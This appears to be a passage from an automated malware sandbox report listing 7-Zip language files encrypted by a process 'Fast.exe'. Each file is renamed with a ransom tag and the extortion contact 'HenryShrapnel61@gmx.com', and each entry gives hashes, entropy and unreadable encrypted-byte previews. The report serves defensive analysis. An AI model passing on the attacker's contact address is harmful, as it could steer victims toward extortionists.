    Encrypted:false
    SSDEEP:384:Kun0FHez7MD7Qcb9G6JlPKpuMZJ3Y2LP/EUXcnI8ZwdpA:tPMDgwP6uMZJPLP/EUXckA
    MD5:E3EFB47B038657B59CFF85738A1D26B9
    SHA1:38A4A102A31B9798F75C8151B31DDE21B71A9B44
    SHA-256:9CB78E04BB95B60F2DE4BD17037323FC48816EE08539AA3C86ACFC17650195BE
    SHA-512:2502F12269DBAFD390E3DB4976CCBF7AB8470DF1CD5DDFFF6D7EF18D2280F6C2BC7D8C620BF41904C5E5562BEA19D0E998AD79523EACEEDCD1039BDEF26D4464
    Malicious:false
    Preview:..P....../.......G......w....J...,.W..>.+....JO(..S.@...|N.0.I..K. T.....4..Z.{1.....m.w}..8j.M.wkw..3...A.~...9..0.....Jf..qu+.).\...{.]..7.......t.vu^..^.m..a.....U.l.r.*$.G.......=MpL.8..@68...g?0R.Ju....h......R....;..0>i...g......2....^.[.k;..vh..&.....1.2lK.a..F".....W.I.L6M.6#.v.Dn.Y?+..h..M..,G.....[.bOL....;.7....:2..^....\...V....A..VR.r...{.1O}C.>ug..DZ..e/....PnX:"...$ ....Hi5C..H...7._...b}..B<N.Gt......W.....'..B.....[....e._......\...4..(.......@g9\.m. .i'...a.g..|.!Z..{..+./l...n.LI'.WX.....*Zs. ..k.X.....G..Q_..{.Kr........P....9.j9..A...j7:.....jK=.....NF.C...Foc.B..D.9w.r......P.c..g.<...x..S.,.k..r.UQ...i.9.o..x...D..m....uy..;.A.oL+........IU.\.w.'$2....\)RPy....p.V{4......=.W@a3f.....2C..c.~.Q......[Hy.s*..........q.E.l70.,..!.........M..G.2_.[.n.X{..&....#..jokk..].ly.d^.....7.&.~.w....W.s..-.]3eJ.ZI..Yk.E...`..aw.../.u..fx....9....W.1.&.y.....2..r...=t..\....9...iL...cR.w:....4....I.+p.>y....2.(....b......}

    C:\Program Files\7-Zip\Lang\kaa.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):8338
    Entropy (8bit):7.97583760669792
    Encrypted:false
    SSDEEP:192:y58wvYBtWgHMT7/qhxDSSB6fkjql5ST+EJSs7FA:yfvQkT7Sh1b8VQThJ/7FA
    MD5:34CD4B1383A4D962B3DC0093E9D0E68B
    SHA1:432B3E270BEB0DEBF4013F0B656CD6E7255B1B08
    SHA-256:5501733BB43733A2396E954880FD4C782B2A84DB51C0A5D023AC9360D234C38B
    SHA-512:11E4F652E69824C74A7EF1E7115704395E58D1F6110244DD381DBC9FB490C1A4D2B5BEBD610792CB82AA6C2C7D0E6DD61EE76738443D58559AE2E6CB44E3F108
    Malicious:false
    Preview:..[.MO...2.X.7.U/GW.^..cd0:......2......5a.Kis.....5....Ax[JVGR....?F........z..<.e...._..a...".G.+.Ru..z.Z-....Y..#..q3...1c..>P9...*.^.^.......i..@.4R..........p..*".u8..,........*.0.J.F...<.z/Y...BD8.{.........[C...L.C...?2...%O.l.;./....].....Zo..l..(Z.v.m..%X.&iV.|...L....|...[.zQ..0..!.h]I.+.F.rZ..tx(*.{q`m..,.~t..j..2.:.Z.#../.KJH..p..l-o.-.E.b[B..4>..v...CKo.&`tq.y.o.....at.[r....I.....'%.......H$.f.pDE.:..d...O1$.Ml.0t.L6A#.{..{..o..:N....\w.Q....5.gz.......,.5.7...pb x./}XI.)........tw..m.<j].._zIS....:.ni[....p1..l|.H.U.o...>..Q/p..G.t..d|.x ..."...(..R0.D./.....n..8..T...;..=.....Tp.;7.|.H......V{|j.G.O)f.R.z..;-..(.ip\.kx.....`..1/k.........8.=.M.O.....m..=.Z..hq=6s.....x...z6.....2.......}w.k.......L.......q,.8......t.'...[.e.?....l|p...+.[f...O.."40.`.s.......k.L.7...-D.1....PD...3......-.5.........uF....T...D..rpA........$....Z.N..........Q.lk.P2..nk...9..aN.@}.>M.M..U.....W.@A......ZF~.`......%...N..[c......

    C:\Program Files\7-Zip\Lang\kab.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):8818
    Entropy (8bit):7.974521027709422
    Encrypted:false
    SSDEEP:192:4jh4OFMGud4lzFx1aymAiy/6+VTeI3tT2LdRSyb8kdjwftbA:4Sanumlx8AiG6+5eIed8ybPdAA
    MD5:954B268B797441F20CACE9B05D0250C7
    SHA1:55B5ABE07F34DF4F9ADBDEA23B0A169529883220
    SHA-256:D9830BC8EA28C5CC4DDC4B08E24B3EC48F221E68D150F4F7EFC7B87F7F587E14
    SHA-512:563AD6610023622403AD8C9BBC273E2EFB830CF4E00AB1BCCB9542826CA7068931EA90765BA5EBACEB6B429FEF97F59AA2F49CDB7C6B63C32079138CB0AA6264
    Malicious:false
    Preview:..o...}C...91q..S......A.e.\..@....|..c.C:.d/.0.2U....@.&............$2.B...\.a..m...9.&..9..:T.@)#...Wg..._....}6...~.K...Fq............."..M.~...U*.EI.......A...$.~Q20S.3.j...*$..j:|X..80=..6R.Y......F-&P.....8...5@..ox..0...."^s.....6..#.Hd...J..'...?..@..0#..T...P..2.'..S.....}.4...&...Z......O.......Z....4.-.gNo ..jg...e.+5.t....{.,A...b...(.U .......[..}.+.&..79....R....?...i.Z^9..!.G.'.HX..!.g..qk.7..tB{......C..CH.....M.dw.Ems.}6..=#.a..b....J........7mm=..V..e...#?.DN+o<[x...4S6._. .$.M........wD.]ci../.].....>=....=.zA......:..V...cn.#F...i. ..#m..Men'.4...w...........Q...2....M)..xod.....3...#.i....%.b.k{......1....1..@1..... .5X2.A.<1N...<.U._..^.....J......;H.........p....o.$drN~.vY[..r.q..]~.r...eY..eU.j....G!....G.s.&.gY....!.|A........!B8q..Sv@q...B....rZ.r.{.....'...uD........C....!......n..G.-..........F..c.06....5.)T..".!..|..R..l...W?-+.X..\v.<......Y.,'.<.\..`...,.o.rjl...$e3.k.......U}X.+.M./.4G.".R..%..u........

    C:\Program Files\7-Zip\Lang\kk.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):10962
    Entropy (8bit):7.982109126307625
    Encrypted:false
    SSDEEP:192:cO4TeZD4/7rekALNrNhZAFFCeICeeo9t9YIc8caIZm2B3FAwBFyLw4hav4IKMrNo:0cD4HFALNrNhZiIjht9YIGD3a4e4rA
    MD5:44B27F7D0F1FBA4F50FEEF47EB635EB3
    SHA1:26F87B0219FC94C05221551B97EF83E21B11803C
    SHA-256:F59800EC9E22BB2F82272B2AFC7C3B42FF47C26A17459465B3507EEA6937C2B2
    SHA-512:744E3B0B5E44212A65969B0F14C602479F7572B6E440A7580CC40CFDEFD53FA9014E0FC8B91F9995CA048583C25BE35EA8A640ACC1B5A3691ACE5F70A6BAB67A
    Malicious:false
    Preview:..VF.K.^..*..Q.k..2.C_8.i@t.......~.PJ...(W... ,sR...9...S.3..}...8...Z..-3..> .w..ADG...;.M..X.Pc...QK...a@.....@..s.N....[UE..r.....QAP[N.ro....i.m.J........ L.D.O..4...q.2.j...=j.W.a.R[I..X.=O..IR.....I;.......d.D.~..b`a.M._....:";.T.&..C!...!..~...!@.,4.80..2G.g...B+..;w.{.....1$9.E.Y}...=a.n.B,m.....X.*Y...r....(.k._l...........:0 .@(.s.rJ.N..f..<C.w...v.....;i.^..../....Yr]..p.C\^z..Q..u.<.Wf....X..N.F....../.*Q.....|..d,T.....1.....7y........'Sc...\....0...W..R.Dmi=[....T..(..>...~!..).:..M.....8.].*.........,c....A.,......."......&...#..r...X...j......$&f.R.8....V&k+.P.o..u.)-.enB.E.*.5....X&..U.L...6.}.H.E7..`Rb@......N.V...4Lu`_..#O.F:..v...H...?_a..5/.......r..l>..'Z../U..\o..l.L..:.wpF.?....=\.8..yz.qY.....3.."...N.4....=.N.JXF.0).nF.d.......|.........x..].OR...Y....Y......#*...2L....{.1...u...~-.....G4.57.E.Dh..K;.Tz.ofO.].S*..C...8-..H.......R.........6W.A...&..[..\....J..S.!...J.i.......U.!._.).......0h.qY.!...O..E.0../..~.

    C:\Program Files\7-Zip\Lang\ko.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):10530
    Entropy (8bit):7.983158349006109
    Encrypted:false
    SSDEEP:192:bqZ71RsqOx1UHAP9Mvidrws0BaMYL6KU+XZKjukU57eGPZHJFuy0/OQ/kA:0RNOxmHUsBa/U+XZwQ5Hzi8A
    MD5:0844E66E2718FC1E2F86B97A919F6495
    SHA1:B2C9C90C188977375D0434A43A525C646A867541
    SHA-256:3D20554028141B077089874475930DBD46A2F1F1ABB57028E75C60AC5FFB7D2D
    SHA-512:22097B104543AC89CDB5645E43F2CCF61D2EEF960D7C0F6FEB2A2EC5DC46BC772E12ED56E005049471CED47951C965F4F2F3800B91362D67D3E897D70C514286
    Malicious:false
    Preview:'.....P ...%J....^.%Al1..s....!.v.K.j..a.p.....!%.....z......mPX~ y3.......7....n.1?$...`W}...O......R.2n..^..w\....z..J.'w.[w....X&..N..T.6...9v..]...R}ri....5..o.q.=.(...\..b.n.jI....:......R.....`.q.....W..z..NA.}....0.V...;ct.Gq.!Fz.......5.G7i.g.qpUZ...9...(c.....{.-RN=-c.6.QZ.5.[.q.?q....Z.0.b&S....l\Z.w...g.ov.{3c.$'..!.2...-...sN.,.;.<...B..\z"...g.....(.A%.X.Eo+lY..x'p.-M..o...=.}p..D...s ...n.x9..?.6.*.w.B. S5.|...ADb...../p....z..<....#.:....#3..Z.}A.m.B. Ng.1.U..[.M....%....v.....H..(.f........a1.p..Jg.k.@R..:.M...... .I9..*.1...].rx...y.6.=....#..n.T"..?.M..o%L.9........K7.]nX.Yk.......R@)`f..._..O......z.D.M..X.(.;V.Ju.E..f......2....|..."9.U..+8..b..-G....P.u.r.;w......>.:.K.W.i.4..q.+.L...x..."1.72g.-..Xv9..D..u.I.c...%..:.........=.;........tQ.W...j.3O....\p.l,.3pNS....Vip.ey+B....O..8.p&..X.".|.v....q\......[q~C.&1...6.,....v........l....D....2I|lA..s..7..m.B...(Tdk?*...:....K=.{.m..j.g..........Nml^w..d.|.....`.x35...._

    C:\Program Files\7-Zip\Lang\ku-ckb.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):12594
    Entropy (8bit):7.982429467701627
    Encrypted:false
    SSDEEP:192:ulK2UGI/plAlcdC1Uye+FrPl51AOBJJvo7LtDn6LTqxmC0d2/ASdySDEtQ:0K2sphAUuPf93JvcDmC0I9EttQ
    MD5:BCA13B7D9F2512D18F7C010D49A951C1
    SHA1:3804D58C752CE9CA48AF4085C80AAE147C7DB9A9
    SHA-256:963946DA9F77957B0E04E1FB93D73B55943969B8B8B934E5F326DE7C05875148
    SHA-512:E113DB9E0A254B26FD7BC1C14AB1212A3ECACC2B5BEEF7F1CB45C9E47874FACE684169340ADA0C7CA7BF99FF57A23D40D024040128F25F83AE861E9A8A52A090
    Malicious:false
    Preview:..yHzL......Mu..m.N.i.$U.n...7......c.......H...[..`YA.xL>'....My...Ne..&.=..x{<....B..~P.SKF#..7.d...Y.q...M..K.t0`Q........b]E4[..%S]....Z=2.x.E.#..[Q.I.#..d.v"4n....&..ET.....@7.*.......[41Id.G...W....P.8.A.4.j8..U..5\P.y....-RL..^G.^...B..{{..Ct..MN.Rt.[.=~.^J.n:.b]Dy./3.../...)qz.3.].8..b....c..&...0{..C....PS7...6.V.Z..,\.J.=..z....u=....c..<4..m.T..|q..C.8............k....~r.C.52u..x...(7n.kps.e..N..`.Y...w..u..w.Yl.X.dL&y.P.9(.n.C...S..pM..7.?...5.f."wB...a..:..0)$.7.#"...c..z..31.N..OR..MTLc:/@?.9V.........p...".U..Y/..6ME.....2M...?.......E..K...:...5.^..g..E...B+Ez..).%(..z.....V..+%P..<!....T...v...8.UP.(..;.V~.F.I4~y..a`.0.b.Tty.....8....6.{_4.1.dG...[......Y...1.....:o.%G.....,..|KC^h/.].....d..ea.F.>.g(e|.7_:..^g.9.ic.B.*a.M%|%6...S....9..;SP...sL...>+G....sF...9.n.j.....)...b...9t.2i.[....f.d.I....<<....'d}..fsC.eU...s...\....e....}.l...K.g.1(G....I._..Y..OR.....c......m..APU.du.......h..q.5.:.d..g....8....!.$i.x+..0.x0.X.E0a.s

    C:\Program Files\7-Zip\Lang\ku.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:OpenPGP Public Key
    Category:dropped
    Size (bytes):6002
    Entropy (8bit):7.962511334239594
    Encrypted:false
    SSDEEP:96:pWs7PaboRJUus7Wy8NFCNAvZ0M1AdgZqoYC+MKgxTutAJhCZZgfQXFiofpv+B/A:pWsjWoRWjSINAx0MQofKgxTutUcZgYXb
    MD5:CC86559FA9D516B4CA81C84D01ED4792
    SHA1:7D55572422E90E25E0818AF3E70F606E61F3E582
    SHA-256:5C5971CC8B7F963955CB906BC3CBF70FC4DF42A95CA9A95CB7BFEE4A59AC9B03
    SHA-512:0E941DC3CB8B10FBD9D6BD969F47F0B68DCE14100B6856CD9A91D67593571494DA909858069288E72D18B71C0135F9019435C61C9D05A2E0B5601EC055E6B1B7
    Malicious:false
    Preview:.b......K).....t..{...%.L.e....9...8wt.5)......$'...E#................(..;J.:.-....."6.,.@..CFzWBn..p...Y. .<.[...N+:...A..m.....r..o.@~.H..>.r..C"lM...!.R..Ay...R.q.A....i.~...*&k....)K=6..c.8n.It...Qz..X.Z......Gaq;7......$P.X.......&..).V:.D.K...W.z.f.^.tokA....'..j.F.P..O....-..j.x...(r.8W..@.v....dW.V..f.<w.FO`..M....A{..5..7....op.}S..}f.o..+...m.k<..,..@<.<...+..._......,[.Gf...D.'o......IE..s.g..h.n.k...AH...........|>.d.*.f.J.O...$v.m..Q9Y....H.:......5.i..w..C...xmHm.....N.y....Y..D.._5>.N......$...-........bj.....\AHF..i.>..qa,>..D.I...>.x ".~..0..\.TJXN.gR......),...i.-..1.......f[1.....P.g.............B.h.....-..;7..]..g.....x.Qn.|..Jy.O...H.p....c.Q.5...J..../....(aYp..............s.k..V..Z.b..K?..a...C...."4?Z...U..B...mA.94....T..R.....5..."...<...|.C}..;`i.PZ...f<?...h.?\X..?kD....{..=/"%.]{.T.i..L.n.......yk.P.R...n...}&$c.U.^.l...f......#x9.Vt.\e<r.....Dd....+@P.K,Q..0Yk......=.m@..?...j...M...n#......EL...H(..x..Y^....

    C:\Program Files\7-Zip\Lang\ky.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):12690
    Entropy (8bit):7.982478511791445
    Encrypted:false
    SSDEEP:384:veJd6sTC0wwZGlwCDgfV9k5U9d/wa/UfA:veV20LihDgQ+5qA
    MD5:D2C81CC19DF16C733ECF2B032AB8D959
    SHA1:45C1C9325D66CB1E803921AFEDDC2ACAB053728F
    SHA-256:118E9CD0CADC681816836600A392D968FA1611C4F9F5E3C9FCDF5202B4C69AD4
    SHA-512:57F37B87C7D8402C1398AC3BD096719A1810E0755E2D19128E8AF1000BCFAF3EFA9B1A2F246013D303252C28ABC5F89711E8AEA85C08AE27AE21E643F01888A3
    Malicious:false
    Preview:j.D..^.o.d.x..*. ..8L_....c.=..vS..-d@>.a..M'...c.D@.H..#A..9Y.N...fp...5..9y..`.X8..U...J..~.K".Ld.v.a.T..0....qiVZ.|W...R......^.o..F.....a2lB.%'.:.V|.P&_.v..T0...........{..q.Y.....p...^..IN<V.Ny@.]...9.I.....Opq].`.n..?...;X.9.2j.........WT..x...e...7....ET:.lT.1O...ZY...).o......D..M..../.^LF...=._.R....-j...:>.$c...F..............iX.x....0.@..,....x.....VN|...*..:...g.....9..{...v..3....6..;.........d...H.I?.....?.iV}..;0...... ..p.....h.5...T..^..7.H./qSJh..]{......mR..Y@:...6+.....=.!RM.t(.5.......S?......C...0..9.S..4..h.T..8.|...gf.6n...u.N...(.R..I.J.3M+\.$.'.l..O..\.t.Y....5..t....PU...:."...hGhT...z....}..Lj..S.Ry.\..D...q.k.kL[......#.....A......6..,.].\..0 k...#yr@}L7n.=.#..f%%.........+.....,....z....E.5...4i.9N......e9..}.^.]X..7.j.C-.....l...<....6..H...W.Q&u.1.......@1B.$<O8.eS*[.t...$73.gM.q3......uK3........Q..B.q....#.....%...a.P.....8.qah..Z*_...yi..)...:.9.j6.!.f..`..%........ bgS.t.7....w..a.C.7.W.F

    C:\Program Files\7-Zip\Lang\lij.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:DOS executable (COM)
    Category:dropped
    Size (bytes):8114
    Entropy (8bit):7.976945684982076
    Encrypted:false
    SSDEEP:192:GyhRY2spzMXqsBBYYzffyF5G2h001FrBbfd8hDJQ1/RPNMvvO3Wq+100A:GuRYL8yzG2hP1FVR+DMRlVT30A
    MD5:D29628A8F4FFD006D7BDE59888441293
    SHA1:591A074095E66D91A91CAA9E6481D3736431F922
    SHA-256:B336BAD073649A35EEF00DE9790A0AAB86D933093220861557FADA6B49B9BF43
    SHA-512:742BE3094C336A57CD30DA0901BE6FC9ABA7AC867DC5406CC9178FC93747EC9198F39B636C21B17C434115282A7EC0B6C82A7C873DDDA92F40AF53DFACAE1E7F
    Malicious:false
    Preview:.4.K.t..g.ii..L=.....L#.-.\m.2\..^ibh2.U.:...~n.......>4&..?_..t#;.^...[<..E.z.......%.N...L.'D..%.W.Y2..V...S;..YI.d8.:.jh.1..^.J.1.g=....>......}G=I......i.h.s....s0.bf...a6}h|8q_X.*.^.<..J..aM..={+sPK..q2z:......Je..6...i..j...S.>l.Q ..z...[@..i..>...B....7\.)V;.Vs..)c"))...<..y.I.E'.-(4.&.*.."@.......;.k.9d9z.7...D".c.n{l.!....\.L..G..n.O.PQ.S@-lz........Z&.&...W2.7.6..-.`..[..'.i.I}.p..R../8..\C.....t..*B\.S<.y^g.S...W.Q\|..^.....o.!d.k.R..X.z~#^.I.bYy...W3...Gj~!.UxX...9....Y_D."D..O......xl......zP.fs..5J.PsVl^#....@.,..../........UoS=_.....$....&....-a`I.-.G5.1...n/...-p...(u.2.*..`KG..+......&.SH.v.'.[...Z..,.....[oCo}.a..{."$.3...".....T....E^.C5...'.]<...}3...n".7D.KG?...b.L..e..5.*..........6.F..#.d........y(SF.y.S.QFt8.f.A3x...g.o.A.K..........`+Q=}-h.Ut.qhV ~^7[...2.)..r..........#....w...W._..m.Z..<............'y....u^..AK..q......m.s...K^...p}.:.....'p...m....;.].z..n...W...AW.....DS....M..?.e,..+.....e|

    C:\Program Files\7-Zip\Lang\lt.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):9762
    Entropy (8bit):7.979950219821513
    Encrypted:false
    SSDEEP:192:fWZu8bUcYHd2RQnb/dTDhPSaaR6YtpX4pG7CR2g2hR+2AbdGeA:uI8TY9J5acKXaGRgqRcBlA
    MD5:5744A356EA1338BD812A8F93B4DE3789
    SHA1:6AAC6D32FF95A8AFBCD93D30E3F5146292ADF4E3
    SHA-256:FB9D43CC960B3034C89D89B45E66D77F15641A7264ACD10689154406D000D2B8
    SHA-512:6976892AE6FCDE39BA45390760D28A2B371C24B9AC896655E0307BC1FB21804BAA4E60D9C1D1E01775639E8A56E38EF1F76C0B3997FDE59338A2A89E63068DD2
    Malicious:false
    Preview:...]zQI.=)...Xr...MC.c]..|.|.`.=X....)...Q....[Ac.e3s^vPi.. /.u.F.....(...Q....m39.mU..:...t^|.l..ZL\k.0..=j... ..p~o).fN .V}.m....F...`.....@.).B?q.@..'_g.y.T.Ab..qQ..$...........H.0.e.W..F..".%.c.....yv....K.M$..Fh....2.X|.y..........Hi....g.0.x.#.=..#*..;t...m..D.h.....y..V.[..$...2.i....@.3....uE.t..+..I..L:X.3......n.Q..;^..:........r[1U.q.1.P...Q.e..>..+.*.*...4./. .q..`O.w..w.1.<...l......c0.{. ..kAS...-(4_]41...f.P.R.+'A.p....;7.....97.@..|.\.Ab.E&{.&c...:.l..;...T...'H.c.`...a..-....YN.uiqp....8eT.Q.].c..*..B-x.... $.1..7z..]...@.U&....+~#Z...:v.k...0...$...kt.G..q...\..(7".._.r5.{.D....K@.*.....d.-....8.Et%r<.......g......s.e..yAt&k.bpN.{....h.*..e/_>KO2. .......!g.~..d\2e.;..D;`..5c.8~...<....D.8(...c......#~..u.....a.R...O..Qc.`B.K.S........u5...j..I>=.s)...H.|.......eY.x*s.~.]J_.x....,..T...<.....i.Y...&...._...........q{.|....|..i+dv.sq#.K.....=.+....3Wz.H.!.U.L3..f{..Y.^._.f...D...D..%.Q.;.2.|(.5z\q.x.*.`..Z tA.w..*.s

    C:\Program Files\7-Zip\Lang\lv.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):5650
    Entropy (8bit):7.963895574056384
    Encrypted:false
    SSDEEP:96:AWqBtdS6CSYD8dmKyvMzJ1ZxpYjEugH59aHreJ539QGcwChnKJbtBuaEoOA:XqNS6uD8ScrhB9uA5tQ/hKLUaEoOA
    MD5:17ABC2DD3A18BFE29F409583BD0862E7
    SHA1:3D68F030F2047F9875E4B664619B6C05FA4D24A5
    SHA-256:29737ADE0437EC14DC9EA3D29645CAF0602F0EA339518A6E17E570426A9083C9
    SHA-512:693816AD74DBEA907EBD6E398AD833A429C4A383694CBFE9097B7391F3F9407496478A7951BC4E4056B9BF5A6E06E12AEC3D6A6C38C4B295CA41231EE1846E68
    Malicious:false
    Preview:....c.."S..|.c........."m.=OV.W=A.....;9.x.P.$..k....A..H...........L..'..a%zj........YX=3......a.._<....cv3.~_Bd>....n....g../.,._....$.......T.H.R...[._.C...b9..g.(#.l3..K..J...4.;..@k.b....T.2$;N...Cy.B........:Li2..L..;.'Y..M..C..5..o....X2..:-2Z..s..F6......}.[.a.ZioW...a...._.'0.@m.g......#.B~.....V@........;o...z..wM.G.@a~.E.../Bz".. .L...O.;Q...G......~...8..z.Ppx......3.....>........k...$.i..;..@.....a...(.......^m...D..3F..ig.|......{w\.....6P\.....e..la\........-...Z.....3....>a..q,k\......2....T??/..^F.9-{......._.|..../.N.).. }p..Y...\>.S...............v.....F....!.]..........9.A.Gu......m.p<._....L.b..V.|.jb.<6M7|(N..m...o........~*z.....35....})..k.A.N..1~..%%.j...;K..C.../XS...O....]P.=s.i...q^.r(.....-......=`..T."...I.C".t|.<.H2.k.r..j>|_.M.5A. J.d.r....bB@..1..t.`...S..gA.J..(..H....`..~8...(.....r$..ty.&.....|). ....3....j5o%m..U.M.-%I.s.r44L.........eU.QB..{>.....f.O.S......R....4.l.5|n.....1YB.....d..^.c..}.g>.qY

    C:\Program Files\7-Zip\Lang\mk.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):8994
    Entropy (8bit):7.977522669690982
    Encrypted:false
    SSDEEP:192:UMTOXBXnFEf7I7eSFzL2mJMWataB3xi6Z5xuLWOA:UNB3SfM7HzqmJM7oUCOiOA
    MD5:01544CEF4DDF21A0873D010E580D7561
    SHA1:C870C0BAB0077B0B9E69FC5A13B86AE5ED8AFE50
    SHA-256:BC8936AA2BFE01B674D491F7FB60C5549A080899C23A48CAF3730457CC38C6B8
    SHA-512:3DC8885BD9FE333622EEC838BDD32B9BA371954A2287D0793FAD56A46338F148B9BA1147C8412ECBB6E1E1F1E44A7F33C8519EDE46C6BBC0B3782D759204F6B7
    Malicious:false
    Preview:....'...!.e.....\.-.....F:i..F=.}.0.1.L.M\....?......B.z.b.|.......q-R.7.t@...N..s....p.29.dC.\,.].Q......#....@...+...`q.......xp.....k....>.G..\....\..x....d.U4.1Ic.eLR..j|D].m........G...e..@..MLs...L...@......c.O..L..Zg.j..E_....]z..I...$..#.V..{_?u....f.F.........L.0..@........:.AV......>....-.O......7...s...P...........W....J-.RV..N1..O&.X..=Q.Hi..x]L.~.o....o..;..D...5f@..R...{..l.K!....k...."y..2..Y...h. .=...IcZ.U.T8...d.2.23.......X.M....Ez..y.Tz.....T.W.LE....K.....E...}o.P.z|........C.k.S~....#F.......m]..$...o....;.%N....Q.zw.N.Z...GIXXw.#} .......;.>>.W..=.n...8...q....T).D..-.2...w............;mx)}....&.U*|;f_..?.x..2.%..W.,+.8A....y.6|a.....}._..2%.,.~f../x.f.&...Z..|6.........wmC......o.<% ..J...m.J...><..C.q....(I..1.|!......=.....W...|..k+.|..J.....?......-au.1..H.......LDQ]...2.}9F.@R....#{$bC..3..o.~..LDg..e..+.d1..].%.6.=.~..8..N.EKY,.t.....o.J$...p'BQ..T.J3x.r.=..c...........H/6w...il>u.6..{.!Y..5...9.M..li..V.

    C:\Program Files\7-Zip\Lang\mn.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):8706
    Entropy (8bit):7.978789126061266
    Encrypted:false
    SSDEEP:192:Q1DijV0crcfBIP3hlrJ0hDRcfNUKBmRuXL1lA:YmjMkPJQDafaKBr1lA
    MD5:F62E52B19E82942DE68F73EA1D02E654
    SHA1:AEDBBB2507507833573E8B3397744F7831688998
    SHA-256:8DDCC2960FC9C967CB7F6DF65B1E67E61E7C42ACD4262CDFB4AA0D69771EA39B
    SHA-512:080AE258CFBB7C0C5AA6304BD3AD7300A2129BAC998DFDE53DDEE2D413B1B185549FC9D2A1F332AAF388213BDDE1BC48EDAA29A619D734D73717E4393C530629
    Malicious:false
    Preview:7.~....~:+.G+{...M.X..oUWK......q..$f.."..y/.HB....B..Io.....x.:.....V c~..?aB._K<..:.-......^..B...z...S..{.nNT6}mUk.1..mw\.S]...>.9).-c.|~.p....q.y.>H.YS..pA..9..5.Ht.3(....|\..2R...ZEvjG.,........M...E.....'./....v.^]B.Z25w...]G.../T0..../t.+....x.....)=s....]..6A.=@n3........s.....)d..}.FmY....=n.\s3|.tf.....<......h...9o:.|h.I..2...Q..v......?F.....G.........V&....8..`.#..:M.h....L.....x..p&w....g..V......u[*...B.2....c.9yt...`2.M.I/.j.\.g.....C..ug.{..0..@.....J...h.v....l:........ l4..E.X.&.s.`..j...r.......m+.......#.5dU.....I..h....g.:....MH....d.g.V.'.A..Q.o.Ax..<sz.N=p.}.cO)..Y_.."F.....7...F. .$++.....LO.....w....[.a.)....4..Y.....b.E.......5Y5|,...w...><.#.V.2....H....d....]..zX.a..L....<.@.3K..A...M.......hm.I...e8.....,?P...n.PZ5..W.i..6.b~.9h.w.M..} ..s5..;.S.%....../...0.I.TN..r.hj....<.0.j8..W.f(.s..K7./.P]...[./.......a0.....N.G..m1..i...H|8..3Cfq%h....:c._..sm.M.....V&.D....Ob.....4...Vw^...........%..S)...u.....

    C:\Program Files\7-Zip\Lang\mng.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:OpenPGP Secret Key Version 7
    Category:dropped
    Size (bytes):20418
    Entropy (8bit):7.991529084059528
    Encrypted:true
    SSDEEP:384:M+J9VtXl/9P9ZphjqmSclGcPju+YQClspekEwg+yIpNiFR2OGIUA:Mg9Vt1VP9vpPGcPqDvlsvaA+UA
    MD5:1C71E2819205DF2FA23D6AAB365C3D51
    SHA1:D062C5055FFA224741BD9D0787CA77D845176993
    SHA-256:9B3A22C469E580A8E9C4DEFF86BA08B703A965B4F28ED98189B97E86EA7C13E6
    SHA-512:263B3EE024B310E788FEB5C2A0B666DC4406692D3EEEF70F8F77377C84501D157B021B615EC9658B449C754D6E999DEF040437D437B96F1D38C26623C60309FE
    Malicious:true
    Preview:..v..?b.T..c.Q].!9w.i.Q.{...Q.V.'.P.d....cg.....CF._/._5..m.i_....3..:kU....).....xV. WP.,...Da..[.....!...]W...#.:.....".q.0......).m.;..Y..C)...3:....J.e.b.l.1".] ..'..T^.xs...i..Z.D...T....0MC...'Q.;....U.{Kv......N..PF..X.....j..Y...O.K1...^k..QeTB...t.4...m...V.r...H..*..>.a;.C..e.T.c.\T......Y=.@nu.=R.[H7....>...4$.9U`Q...U...Y}P....w;...@..@T-.qW.7.{.6(3".Q!..E.:..7x..80..q8....').)"..Y..u..C...$-...R!..Vs.j.W......`..^S..ml..:TR.....S{jD.G..R1.....[.....V..xo...P....?..e..'l#....M]........:....U.U........dY.'...B..|m......;Z}.f.`<.yl.V...H..7.3..:.5...........^.3I]P).I..!:...5......mV...ZC....&`...].......{....4*...?.%e..J..8O........Rsz.2..><D..@p".A......r....u.h...."Ah.|.r*gvi..s........V..SQ.^....By....].).....}7I.h.....hgJ...E2.l.4B....~..Z...84..Y.+......."..F..uD.U.Q.........mZ.q.0%...............C5$..._.....w|..zt..G5.l.Z3.m<..feU..5.......(.e.A..CP.Bu.>.vf}..e.M..e....B..h|a.?...........9[*Z......M.S.......d.isyY..

    C:\Program Files\7-Zip\Lang\mng2.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):21826
